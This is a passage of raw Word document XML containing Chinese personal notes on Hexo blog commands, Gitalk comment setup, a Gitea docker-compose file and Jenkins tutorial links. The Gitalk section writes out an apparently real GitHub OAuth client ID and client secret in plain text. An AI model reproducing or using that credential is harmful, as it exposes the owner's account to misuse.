                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3067945" cy="1302750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1BF83" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="0A26B994" w14:textId="38767B1B" w:rsidR="00324BC4" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C9B65" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo new "name"       # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB22EFB" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo new page "name"  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1435B" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo g                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541B806" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo d                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DA056" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo g -d             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成页面并部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383CDB22" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo s                # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地预览</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF83AB" w14:textId="77777777" w:rsidR="00AC15BD" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo clean            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除缓存和已生成的静态文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C4DFC" w14:textId="155AE235" w:rsidR="00324BC4" w:rsidRDefault="00AC15BD" w:rsidP="00AC15BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo help             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E2BCA" w14:textId="77777777" w:rsidR="00324BC4" w:rsidRDefault="00324BC4" w:rsidP="009A641D"/>
    <w:p w14:paraId="3C2E17B8" w14:textId="77777777" w:rsidR="00324BC4" w:rsidRDefault="00324BC4" w:rsidP="009A641D"/>
    <w:p w14:paraId="7BC41582" w14:textId="5F237D5B" w:rsidR="009864A2" w:rsidRDefault="00B23739" w:rsidP="00B23739">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gittalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DC768" w14:textId="18D9F054" w:rsidR="00B23739" w:rsidRDefault="009A2282" w:rsidP="00B23739">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hexo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要完成评论和统计功能，需要使用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能，此处有个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gittalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以完成这个功能。我生成的令牌如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3428FA13" w14:textId="77777777" w:rsidR="00B23739" w:rsidRDefault="00B23739" w:rsidP="00B23739">
      <w:r>
        <w:t>Client ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561C5BD0" w14:textId="230E78FB" w:rsidR="00B23739" w:rsidRDefault="00B23739" w:rsidP="00B23739">
      <w:r>
        <w:t>560096261ffd521cb246</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487575E" w14:textId="7EAF747F" w:rsidR="00B23739" w:rsidRPr="00B23739" w:rsidRDefault="00B23739" w:rsidP="00B23739">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>client secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E61C4" w14:textId="3C49B0AE" w:rsidR="009A641D" w:rsidRPr="009A641D" w:rsidRDefault="00B23739" w:rsidP="009A641D">
      <w:r w:rsidRPr="00B23739">
        <w:t>c23b9dbe23cc3a05856a0035d4e8d88d99ca64e2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23B261" w14:textId="77777777" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EC3808" w14:textId="77777777" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E91269D" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2122D39E" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078159FF" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5678E2BB" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1717E41A" w14:textId="7A54A151" w:rsidR="00AD0910" w:rsidRPr="00AD0910" w:rsidRDefault="00A02777" w:rsidP="00A02777">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>DevOps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140FDEC1" w14:textId="77777777" w:rsidR="000909D8" w:rsidRPr="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225346F0" w14:textId="031609A1" w:rsidR="00F975F8" w:rsidRDefault="00F975F8" w:rsidP="00A02777">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="849" w:name="_Toc159780269"/>
      <w:r>
        <w:t>gitea</w:t>
      </w:r>
      <w:bookmarkEnd w:id="849"/>
    </w:p>
    <w:p w14:paraId="4C862816" w14:textId="77777777" w:rsidR="0040040D" w:rsidRDefault="0040040D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BCB1BA" w14:textId="77777777" w:rsidR="0040040D" w:rsidRPr="00F975F8" w:rsidRDefault="0040040D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365562BC" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B987A3" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>version: "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C953AAD" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F8DD1B" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4741FA" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  gitea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB069D" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    external: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF97300" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BDA928" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F3B6C" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">  server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50677A8C" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: gitea/gitea:1.21.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD51E4F" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    container_name: gitea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F88130" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680C2AB" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - USER_UID=1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B8BE64" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - USER_GID=1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CB283" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B08F732" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22002E6E" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - gitea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01EFC6" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71587982" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./gitea:/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A76B8" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /etc/timezone:/etc/timezone:ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE972D8" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /etc/localtime:/etc/localtime:ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7A7EE" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672218AB" w14:textId="77777777" w:rsidR="00F1343A" w:rsidRPr="00F1343A" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "3000:3000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB0F53" w14:textId="221955B4" w:rsidR="0040040D" w:rsidRDefault="00F1343A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F1343A">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">      - "222:22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087CC6E" w14:textId="77777777" w:rsidR="0040040D" w:rsidRDefault="0040040D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BA534E" w14:textId="0C6A224A" w:rsidR="0040040D" w:rsidRPr="003A08F2" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>因为此处制定了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>gid</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的环境变量，因此</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> volume</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>中挂载目录直接是当前工作目录中挂载，不是非得</w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">docker volume </w:t>
      </w:r>
      <w:r w:rsidRPr="003A08F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>中挂载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADCE59C" w14:textId="77777777" w:rsidR="000A6E98" w:rsidRDefault="000A6E98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1AABC8" w14:textId="5440B09B" w:rsidR="0040040D" w:rsidRDefault="00CB7AD3" w:rsidP="00A02777">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="850" w:name="_Toc159780270"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jenkins</w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>
    </w:p>
    <w:p w14:paraId="3268914E" w14:textId="73B215BA" w:rsidR="00CB7AD3" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:hyperlink r:id="rId315" w:history="1">
        <w:r w:rsidR="00860222" w:rsidRPr="006E649C">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://www.jenkins.io/zh/doc/book/installing/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FAC3B61" w14:textId="655138AC" w:rsidR="00860222" w:rsidRDefault="00860222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方教程：</w:t>
      </w:r>
      <w:r w:rsidRPr="00860222">
        <w:t>https://www.jenkins.io/zh/doc/pipeline/tour/hello-world/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443C7E5" w14:textId="77777777" w:rsidR="00860222" w:rsidRPr="00860222" w:rsidRDefault="00860222" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C862B2E" w14:textId="3601516E" w:rsidR="00CB7AD3" w:rsidRDefault="00A34AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId316" w:history="1">
        <w:r w:rsidRPr="00B5469C">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/Gitea/p/jenkins.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B5469C" w:rsidRPr="00B5469C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B5469C" w:rsidRPr="00B5469C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（这个教程重要，教如何</w:t>
      </w:r>
      <w:r w:rsidR="00B5469C" w:rsidRPr="00B5469C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gitea+jenkins</w:t>
      </w:r>
      <w:r w:rsidR="00B5469C" w:rsidRPr="00B5469C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>配置）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6C414" w14:textId="77777777" w:rsidR="00A34AE1" w:rsidRPr="006D02EC" w:rsidRDefault="00A34AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32334E91" w14:textId="21257BFC" w:rsidR="00CB7AD3" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方文档命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEBB4B6" w14:textId="77777777" w:rsidR="00916924" w:rsidRPr="00916924" w:rsidRDefault="00916924" w:rsidP="009222EB">
      <w:pPr>
